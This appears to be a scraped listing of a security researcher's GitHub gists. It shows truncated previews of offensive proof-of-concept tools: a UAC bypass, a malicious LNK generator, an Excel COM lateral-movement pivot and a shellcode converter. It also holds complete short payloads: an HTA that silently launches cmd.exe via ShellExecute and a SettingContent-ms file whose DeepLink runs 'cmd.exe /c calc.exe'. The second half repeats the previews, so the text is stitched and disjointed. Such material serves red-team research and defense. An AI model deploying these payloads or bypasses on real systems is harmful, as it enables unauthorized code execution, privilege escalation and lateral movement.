Matt Nelson enigma0x3

## keybase.md

      
              1 file
            
          
              2 forks
            
          
              0 comments
            
          
              0 stars
            
          
                enigma0x3
                / keybase.md
            
            
              Created
              May 5, 2015 15:28
            
          
    Keybase proof

I hereby claim:

I am enigma0x3 on github.
I am enigma0x3 (https://keybase.io/enigma0x3) on keybase.
I have a public key whose fingerprint is ACA2 EE69 66CD 2383 F8CF  98E7 BD02 7173 DFDC DF56

To claim this, I am signing this object:

  
## Backdoor-Minimalist.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
		<![CDATA[


## UACBypass.ps1
function Invoke-UACBypass {
<#
.SYNOPSIS

Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

## Create-LNK.ps1
function Create-LNKPayload{
<#
    .SYNOPSIS

        Generates a malicous LNK file

    .PARAMETER LNKName

        Name of the LNK file you want to create.

## COM.hta
<script language="VBScript">
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "cmd.exe",Null,"C:\Windows\System32",Null,0
self.close
</script>

## Invoke-ExcelMacroPivot.ps1
function Invoke-ExcelMacroPivot{
<#
    .AUTHOR
       Matt Nelson (@enigma0x3)
    .SYNOPSIS
       Pivots to a remote host by using an Excel macro and Excel's COM object
    .PARAMETER Target
        Remote host to pivot to
    .PARAMETER RemoteDocumentPath
        Local path on the remote host where the payload resides

## test.SettingContent-ms
<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
    <SettingIdentity>
      <PageID></PageID>

## rpc_dump_august.txt
--------------------------------------------------------------------------------
<WinProcess "smss.exe" pid 520 at 0x5db0c50L>
64
[!!] Invalid rpcrt4 base: 0x0 vs 0x7ff868230000
--------------------------------------------------------------------------------
<WinProcess "csrss.exe" pid 776 at 0x5db0908L>
64

Interfaces :
Endpoints :

## ConvertShellcode.py
import binascii
import sys

file_name = sys.argv[1]
with open (file_name) as f:
	hexdata = binascii.hexlify(f.read())
	hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
	shellcode = ''
	for i in hexlist:
		shellcode += "0x{},".format(i)

## rpc_dump_rs5.txt
--------------------------------------------------------------------------------
<WinProcess "smss.exe" pid 368 at 0x5306908L>
64
[!!] Invalid rpcrt4 base: 0x0 vs 0x7ffec24f0000
--------------------------------------------------------------------------------
<WinProcess "csrss.exe" pid 472 at 0x5306e48L>
64

Interfaces :
Endpoints :
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!-- License: BSD3-Clause -->
	<script language="JScript">
	<![CDATA[
	function Invoke-UACBypass {
	<#
	.SYNOPSIS

	Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

	Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
	License: BSD 3-Clause
	Required Dependencies: None
	Optional Dependencies: None
	function Create-LNKPayload{
	<#
	.SYNOPSIS

	Generates a malicous LNK file

	.PARAMETER LNKName

	Name of the LNK file you want to create.
	<script language="VBScript">
	Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
	obj.Document.Application.ShellExecute "cmd.exe",Null,"C:\Windows\System32",Null,0
	self.close
	</script>
	function Invoke-ExcelMacroPivot{
	<#
	.AUTHOR
	Matt Nelson (@enigma0x3)
	.SYNOPSIS
	Pivots to a remote host by using an Excel macro and Excel's COM object
	.PARAMETER Target
	Remote host to pivot to
	.PARAMETER RemoteDocumentPath
	Local path on the remote host where the payload resides
	<?xml version="1.0" encoding="UTF-8"?>
	<PCSettings>
	<SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
	<ApplicationInformation>
	<AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
	<DeepLink>%windir%\system32\cmd.exe /c calc.exe</DeepLink>
	<Icon>%windir%\system32\control.exe</Icon>
	</ApplicationInformation>
	<SettingIdentity>
	<PageID></PageID>
	--------------------------------------------------------------------------------
	<WinProcess "smss.exe" pid 520 at 0x5db0c50L>
	64
	[!!] Invalid rpcrt4 base: 0x0 vs 0x7ff868230000
	--------------------------------------------------------------------------------
	<WinProcess "csrss.exe" pid 776 at 0x5db0908L>
	64

	Interfaces :
	Endpoints :
	import binascii
	import sys

	file_name = sys.argv[1]
	with open (file_name) as f:
	hexdata = binascii.hexlify(f.read())
	hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
	shellcode = ''
	for i in hexlist:
	shellcode += "0x{},".format(i)
	--------------------------------------------------------------------------------
	<WinProcess "smss.exe" pid 368 at 0x5306908L>
	64
	[!!] Invalid rpcrt4 base: 0x0 vs 0x7ffec24f0000
	--------------------------------------------------------------------------------
	<WinProcess "csrss.exe" pid 472 at 0x5306e48L>
	64

	Interfaces :
	Endpoints :